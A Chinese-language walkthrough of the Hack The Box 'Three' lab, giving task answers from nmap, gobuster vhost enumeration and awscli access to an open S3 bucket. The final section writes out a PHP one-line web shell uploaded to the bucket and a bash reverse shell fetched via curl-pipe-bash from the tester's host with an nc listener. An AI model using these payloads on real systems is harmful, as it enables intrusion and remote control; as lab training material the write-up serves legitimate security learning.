HTB-Three

1.TASK1

输入命令：

nmap -sS -sV 10.129.247.144

-sC 使用默认脚本扫描

-sV 探测服务/版本信息

答案：2

2.TASK2

问题：网站“联系人”部分提供的电子邮件地址的域是什么？

答案：thetoppers.htb

3.TASK3

问题：在没有DNS服务器的情况下，我们可以使用哪个Linux文件将主机名解析为IP地址，以便能够访问指向这些主机名的网站？

答案：/etc/hosts

4.TASK4

问题：在进一步枚举过程中发现了哪个子域？

输入命令：

gobuster vhost -w /usr/share/dnsenum/dns.txt -u http://thetoppers.htb/

这里答案是s3，但是我扫不出来，换了个更多的字典，甚至把里面只剩下s3也不行，不知道是为什么，如果有师傅知道的话麻烦帮我解答下，然后把s3.thetoppers.htb加入到hosts里即可打开

5.TASK5

问题：哪个服务正在发现的子域上运行？

答案: Amazon S3

Amazon Simple Storage Service （Amazon S3） 是由 Amazon Web Services （AWS） 提供的公共云服务。Amazon S3 通过简单的 Web 服务接口提供对象存储。它被广泛用于存储照片，视频，文本文件，文档，PDF文件，并存储大量数据的备份。

6.TASK6

问题：哪个命令行实用程序可以用于与在发现的子域上运行的服务交互？

答案：awscli

7.TASK7

问题：哪个命令用于设置AWS CLI安装？

答案：aws configure

8.TASK8

问题：上面的实用程序用来列出所有S3存储桶的命令是什么？

aws s3 ls --endpoint=http://s3.thetoppers.htb/ s3://thetoppers.htb #列出所有 s3 存储桶

这里记得先用aws configure设置一下ID和name，否则会报错

9.TASK9

问题：此服务器配置为运行用何种web脚本语言编写的文件？

从上题命令可以看到有一个index.php文件

答案：PHP

10.SUBMIT FLAG

这里我们需要先写一个一句话木马，然后上传

echo '<?php system($_GET["cmd"]);?>' > shell.php
aws s3 cp shell.php --endpoint=http://s3.thetoppers.htb/ s3://thetoppers.htb

到目录下检查一下发现上传成功

此时可以在浏览器直接执行命令

找到flag文件后通过cat命令可以读取

或者可以通过命令执行shell，curl执行bash脚本反弹shell来实现命令行交互。

首先生成bash一句话shell.sh

vi bash.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.15.94/9999 0>&1  #这里的IP是本机IP
#python创建简易服务器
python3 -m http.server 8090
#nc监听端口
nc -lvnp 9999  #监听
#浏览器执行：http://thetoppers.htb/shell.php?cmd=curl 10.10.15.94:8090/bash.sh | bash